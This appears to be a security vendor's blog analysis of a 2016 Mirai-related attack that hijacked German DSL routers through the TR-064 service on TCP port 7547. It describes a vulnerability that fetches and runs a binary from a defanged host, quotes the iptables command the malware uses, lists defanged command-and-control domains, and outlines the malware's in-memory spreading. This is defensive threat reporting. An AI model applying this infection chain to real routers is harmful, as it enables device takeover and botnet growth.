Starting from yesterday, many DSL customers in Germany were reporting problems with their routers, which weren’t able to connect to their ISP anymore or that the internet connection was very weak.
Today we saw news, that a malicious attack could be the reason for this widespread problem.
Fortunately we got some more technical details from users reporting the specific behaviour. With this information, were able to get hands on some samples and were able to reconstruct some details. Let’s have a quick look:
As mentioned, users were seeing suspicious network activity.
They saw this request incoming on TCP port 7547:
This request is described in the TR-064 specification of methods for configuring DSL CPE (customer-premises equipment).
A vulnerability in affected routers causes the device to download the binary with file name “1” from http://l.ocalhost[.]host to the /tmp/-directory and executes it.
The IP addresses of this host changed a few times during the day.
Starting from 28th November 2016, 16:36 CET the domains cannot be resolved to domains anymore (“NXDOMAIN”).
During a quick analysis of the ELF 32-bit MIPS-MSB (big endian) variant used in todays attacks on German customers, we saw this Mirai-related sample perfoming this behaviour:
Delete itself from filesystem (resides only in memory)
Close vulnerable port using iptables: “iptables -A INPUT -p tcp –destination-port 7547 -DROP“
Resolve command and control servers using DNS 22.214.171.124
Scan the internet for open TCP 7547 and infect other devices using the same malicious request as seen above.
Since the malware is not able to write itself to the router’s persistent filesystem, the infection will not survive a reboot.
Our products detect the corresponding binaries as HEUR:Backdoor.Linux.Mirai.b
Update (2016-11-28 19:50 CET)
At the moment the C2 servers timeserver[.]host and securityupdates[.]us are both pointing to US military related IPs in the 126.96.36.199/8 range. Since there is no Mirai related infrastructure behind this network range, the bots will not receive any further commands until the criminals behind this attack will change the DNS records again.
For sure, this is some kind of trolling from the criminals who conducted the attack.